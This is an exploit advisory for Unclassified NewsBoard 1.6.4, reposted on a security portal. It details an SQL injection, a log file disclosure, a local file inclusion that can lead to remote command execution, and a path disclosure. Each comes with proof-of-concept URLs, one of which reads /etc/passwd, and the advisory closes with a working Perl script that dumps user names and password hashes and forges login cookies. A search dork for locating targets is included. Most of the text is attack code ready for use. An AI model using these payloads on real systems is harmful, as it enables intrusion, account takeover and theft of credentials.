首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Unclassified NewsBoard 1.6.4 Multiple Remote Vulnerabilities
来源:girex.altervista.org 作者:girex 发布时间:2009-06-02  

# Author_ girex
# Homepage_ girex.altervista.org
# Date_  31/05/2009

# CMS_  Unclassified NewsBoard 1.6.4 (and maybe lower)
# Dork_  "This board is powered by the Unclassified NewsBoard software, 1.6.4"

# Multiple remote vulnerabilities

# 1) Remote SQL Injection     (php.ini regardless)
# 2) Logs File Disclosure     (register_globals = On)
# 3) Local File Inclusion / Remote Command Execution (register_globals = On / magic_quotes_gpc = Off)
# 4) Full Path Disclosure    

#################################################################################

# 1) Remote SQL Injection
# Works regardless of php.ini settings

# File: /unb_lib/common.lib.php - Lines: 78-103

if (get_magic_quotes_gpc())
{
 #$mq_old = array('\\\'', '\\"', '\\\\', '\\0');
 #$mq_new = array('\'',   '"',   '\\',   '');
 foreach ($_GET as $key => $value)
 {
  if (is_string($_GET[$key])) $_GET[$key] = stripslashes($value);
 }
 foreach ($_POST as $key => $value)
 {
  #if (!is_array($_POST[$key])) $_POST[$key] = str_replace($mq_old, $mq_new, $value);
  if (is_string($_POST[$key])) $_POST[$key] = stripslashes($value);
 }
 foreach ($_REQUEST as $key => $value)
 {
  if (is_string($_REQUEST[$key])) $_REQUEST[$key] = stripslashes($value);
 }
 foreach ($_COOKIE as $key => $value)
 {
  if (is_string($_COOKIE[$key])) $_COOKIE[$key] = stripslashes($value);
 }
 foreach ($_FILES as $key => $value)
 {
  $_FILES[$key]['name'] = stripslashes($value['name']);
 }
}

# If magic_quotes_gpc are set to On it stripslash all input variables, so we don't need mq = off.
# Now the vars are sanizated for SQL queries with UnbDbEncode function in database.lib.php

# File: /unb_lib/database.lib.php - Lines: 805-825

function UnbDbEncode($str, $forLIKE = false)
{
 // Clean parameters
 $str = strval($str);

 $str = str_replace('\\', '\\\\', $str);      <==  escape backslash
 $str = str_replace('\'', '\\\'', $str);      <==  escape quote
 #$str = str_replace('\'', '\'\'', $str); 
 $str = str_replace('"', '\\"', $str);      
 $str = str_replace("\n", '\\n', $str);
 $str = str_replace("\r", '\\r', $str);
 $str = str_replace("\t", '\\t', $str);

 if ($forLIKE)
 {
  $str = str_replace('\\', '\\\\', $str);  <== this is wrong, delete the escaping of the quote for example
  $str = str_replace('%', '\\%', $str);
  $str = str_replace('_', '\\_', $str);
 }
 return $str;
}

# As you can see, if $forLIKE is set to true the effect of the escaping is vanificated
# '  => \' => (if $forLIKE == true) => \\'

# File: /unb_lib/search.inc.php - lines:

  if ($_REQUEST['InSubject'] || $_REQUEST['InMessage'])
  {
   $highlight = array();
   $words = explode_quoted(' ', $_REQUEST['Query']);      <==
   ...
   foreach ($words as $word)
   {
    if ($word != '')
    {
     ...
     // case-insensitive search
     $in_subject .= '(p.Subject LIKE \'%' . UnbDbEncode($word, true) . '%\' OR ' .   <==
      't.Desc LIKE \'%' . UnbDbEncode($word, true) . '%\' AND p.Date = t.Date)';
     ... 
     $in_message .= '(p.Msg LIKE \'%' . UnbDbEncode($word, true) . '%\')'; <== vuln sanizating
     // this doesn't work:
     ...
     $query .= '(';
     if ($_REQUEST['InSubject']) $query .= $in_subject;
     if ($_REQUEST['InSubject'] && $_REQUEST['InMessage']) $query .= ($not ? ' AND ' : ' OR ');
     if ($_REQUEST['InMessage']) $query .= $in_message;
     $query .= ')';

 ......

 if (!$error)
 {
  $record = $UNB['Db']->FastQuery(   <== vuln query
   /*table*/ array(
    array('', 'Posts', 'p', ''),
    array('LEFT', 'Threads', 't', 'p.Thread = t.ID')),
   /*fields*/ $_REQUEST['ResultView'] == 1 ?
    't.ID, t.Forum' :
    'p.ID, t.ID, t.Forum',
   /*where*/ $query,
   /*order*/ '',
   /*limit*/ '',
   /*group*/ $_REQUEST['ResultView'] == 1 ? 't.ID' : '');


# $_REQUEST['Query'] var is 'sanizated' with the bugged function UnbDbDecode so we can manipulate the query.

# PoC: [host]/[path]/forum.php?req=search&Query=xxx'))OR/**/1=1%23&ResultView=2&InMessage=1&Sort=2&Forum=0

#################################################################################

# 2) Logs file disclosure
# Need register_globals = On

# File: /unb_lib/common.lib.php  -  lines: 127-135

// unregister_globals :) for more security (except for install/import scripts)
if (ini_get('register_globals') && !$UNB['Installing'])
{
 if (sizeof($_SESSION)) foreach (array_keys($_SESSION) as $key) unset($$key);
 if (sizeof($_GET)) foreach (array_keys($_GET) as $key) unset($$key);
 if (sizeof($_POST)) foreach (array_keys($_POST) as $key) unset($$key);
 if (sizeof($_COOKIE)) foreach (array_keys($_COOKIE) as $key) unset($$key);
 if (sizeof($_SERVER)) foreach (array_keys($_SERVER) as $key) unset($$key);
}

# This is simply bypassable using and defining global vars via GLOBALS array
# like forum.php?GLOBALS[var]=value

# Now let's see rss.inc.php
# File: /unb_lib/rss.inc.php  -  lines: 69-77

$type = $_REQUEST['type'];
...
if ($type == 1)
 $filename = strtolower(str_replace('.', '', $format)) . '.' . $forumid . '.xml';
if ($type == 2)
 $filename = strtolower(str_replace('.', '', $format)) . '.allposts.xml';

$filename = dirname(__FILE__) . '/rsscache/' . $filename;

$rss = new UniversalFeedCreator();
if ($cache_time) $rss->useCached($format, $filename, $cache_time);    <== vuln function

# If type is set for example to 3, we can define $filename

# File: /unb_lib/feedcreator.lib.php 

 function useCached($filename="", $timeout=3600) {
  $this->_timeout = $timeout;
  if ($filename=="") {
   $filename = $this->_generateFilename();
  }
  if (file_exists($filename) AND (time()-filemtime($filename) < $timeout)) {
   $this->_redirect($filename);   <== vuln function
  }
 }

# NOTE: the file as you can see must be edited in the last hour
 ...

 function _redirect($filename) {

  Header("Content-Type: ".$this->contentType."; charset=".$this->encoding."; filename=".basename($filename));
  Header("Content-Disposition: inline; filename=".basename($filename));
  readfile($filename, "r");    <== here local file disclosure   
  die();
 }

# NOTE: the file as you can see must be edited in the last hour
# So it is only usefull to see log's files. (we can't access them directly couse use of .htaccess)

# PoC: [host]/[path]/forum.php?req=rss&type=3&forum=1&GLOBALS[filename]=../logs/board-yyyy-mm-dd.log
# Where yyyy-mm-gg are the current year month and day.

#################################################################################

# 3) Local file inclusion / Remote command execution
# Need register_globals = On and magic_quotes_gpc = Off

# File: /unb_lib/ute.runtime.lib.php - lines:

function UteShowAll()
{
 global $UTE;

 if (!isset($UTE['__tplCollection']) || !is_array($UTE['__tplCollection'])) return;
 
 foreach ($UTE['__tplCollection'] as $tpl)
 {
 
  UteShow($tpl['file'], $tpl['params']);
 }
 $UTE['__tplCollection'] = null;
}

# UteShowAll is called to include local templates..
# But $UTE array is not properly inizialitizated..
# So $UTE['__tplCollection'] array is writable via GLOBALS trick so let's see UteShow function...

function UteShow($file, &$params)
{
 global $UTE;

 $sourceFile = $UTE['__sourcePath'] . '/' . $file;
 $cacheFile = $UTE['__cachePath'] . '/' . $file . '.php'; <== vulnerable variable

 ...

 if ($UTE['__haltOnFileError'] && !file_exists($cacheFile) && !is_readable($cacheFile))
  die('<b>UTE error:</b> cannot include template "' . $file . '", does not exist or is not readable<br />');

 $ret = include($cacheFile);  <== vulnerable inclusion
 if (!$ret)
  die('<b>UTE error:</b> error including template "' . $file . '"<br />');

 ...
 return true;
}

# So there is a local file inclusion working with rg = on and mq = off couse use of nullbyte

# PoC: [host]/[path]/forum.php?GLOBALS[UTE][__tplCollection][a][file]=../../../../../../../../../../../../etc/passwd%00

# NOTE: you can obatin a Remote Command Execution:

  - injecting php code in log's file and including it.
  - uploading an attachment in your topic with malicious code.
  - uploading an avatar with malicios code in exif data.

#################################################################################

# 4) Full path disclosure

# Finally to get a simply full path disclosure make this request:
# /[host]/[path]/extra/import/import_wbb1.php


#################################################################################
########################## Remote SQL Injection Exploit #########################
#################################################################################

#!/usr/bin/perl
# Unclassified NewsBoard 1.6.4 Remote SQL Injection Exploit
# Coded by girex

use LWP::UserAgent;
use HTTP::Cookies;

if(not defined $ARGV[0])
{
 print "\nusage: perl $0 <host> <path>\n";
 print "example: perl $0 localhost /unb/\n\n";
 exit;
}

my $lwp = new LWP::UserAgent;
my $cookie_jar =  new HTTP::Cookies;

$lwp->cookie_jar($cookie_jar);
$lwp->default_header('Accept-Language: en-us,en;q=0.5');
$lwp->agent('User-Agent: Mozilla/5.0 (X11; U; Linux; it; rv:1.9.0.10) Firefox/3.0.10');


my $target  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
   $target .=  $ARGV[1] unless not defined $ARGV[1];
   $target .= '/' unless $target =~ /\/$/;

banner();
my $id = '1';     # change if need
my $default_prefix = 'unb1';   # change if need
my $abs_path = get_abs_path();    # using path disclosure bug
my $cookie_prefix = get_cookie_prefix(); # getting cookie prefix and session

print "[+] Path disclosure: $abs_path\n" if defined $abs_path;

$injection = "-1) AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,table_name,".
      "12,13,14,15,16,17,18,19 FROM information_schema.tables WHERE table_name LIKE '%_GroupMembers' LIMIT 0,1#";

$table_name = make_inj($injection);

if(defined $table_name and $table_name =~ /(\w+)_GroupMembers/)
{
 $prefix = $1;
 print "[+] Found table prefix via information schema: ${prefix}_\n\n";
}
else
{
 $prefix = $deafult_prefix;

# Change this query if need
$injection = "-1) AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat(Name,0x3a,Password),".
      "12,13,14,15,16,17,18,19 FROM ${prefix}_Users WHERE ID=${id} OR 1 LIMIT 0,1#";

$login = make_inj($injection);

if(defined $login)
{
 ($username, $hash) = split(':', $login,2);
 print "[+] Username: $username\n[+] Hash: $hash\n\n";

 if(length($hash) == 32)
 {
  $cookie = "UnbUser-${cookie_prefix}=${id}+${hash}";
  print "[+] Password is hashed in md5 use this cookie to authenticate:\n";
  print "[+] Cookie: $cookie\n\n";
 }
 elsif(length($hash) == 34)
 {
  print "[-] Hash retrieved is NOT a md5, so can't retrieve cookie to authenticate.\n";
  print "[-] See the source to know how to bruteforce it\n\n";
 }
 else
 {
  $password = $1 if $hash =~ /\{(.+)\}/;
  print "[+] Password is in plain-text use $username and $password to login!\n\n";
 }
}
else
{
 print "[-] Unable to retrieve user's hash, probably wrong prefix\n\n";
}

sub get_abs_path()
{
 my $res = $lwp->get($target.'extra/import/import_wbb1.php');
 
 if($res->is_error)
 {
  return undef;
 }

 if($res->content =~ /in <b>(.*)extra\/import\/import_wbb1.php<\/b> on line/)
 {
  return $1;
 }

 return $undef;
}

sub get_cookie_prefix()
{
 my $res = $lwp->get($target.'forum.php');

 if($res->is_error)
 {
  print "[-] Unable to request ${target}forum.php\n";
  print "[-] ". $res->status_line."\n\n";
  exit;
 }
 
 if($res->as_string =~ /Set-Cookie: unb(\d+)sess=(\w{32})/)
 {
  $v = $1;
  $val = $2;
 }

 return "unb${v}";
}

sub make_inj()
{
 my $inj = hex_str(shift);
 my $final_inj = "1')AND(1=2))UNION/**/SELECT/**/$inj,-1111,-1111%23";

 my $res = $lwp->get($target."forum.php?req=search&Query=${final_inj}&ResultView=2&InMessage=1&Forum=0&set_lang=en");

 if($res->is_error)
 {
  print "[-] ". $res->status_line . "\n\n";
  exit;
 }

 if($res->content =~ /<small>Subject:<\/small> <b>(.+)<\/b>/)
 {
  return $1;
 }

 open(DEBUG, '>', 'debug.htm');
 print DEBUG $res->content;
 close(DEBUG);

 return undef;
}

sub hex_str()
{
 return '0x'. unpack("H*", shift);
}

sub banner()
{
 print "\n[+] Unclassified NewsBoard 1.6.4 Remote SQL Injection Exploit\n";
 print "[+] Coded by girex\n\n";
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Roxio CinePlayer 3.2 (IAManage
·Apache mod_dav / svn Remote De
·RadCLASSIFIEDS Gold v2 (seller
·linux/x86 Bind ASM Code Linux
·EXPLOIT Online Grades & Attend
·ASP Football Pool 2.3 Remote D
·ICQ 6.5 URL Search Hook / ICQT
·The Linksys WAG54G2 web manage
·Apple iTunes 8.1.1 (ITMS) Mult
·Atomix Virtual Dj Pro 6.0 Stac
·ZeusCart <= 2.3 (maincatid) SQ
·Podcast Generator <= 1.2 unaut
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved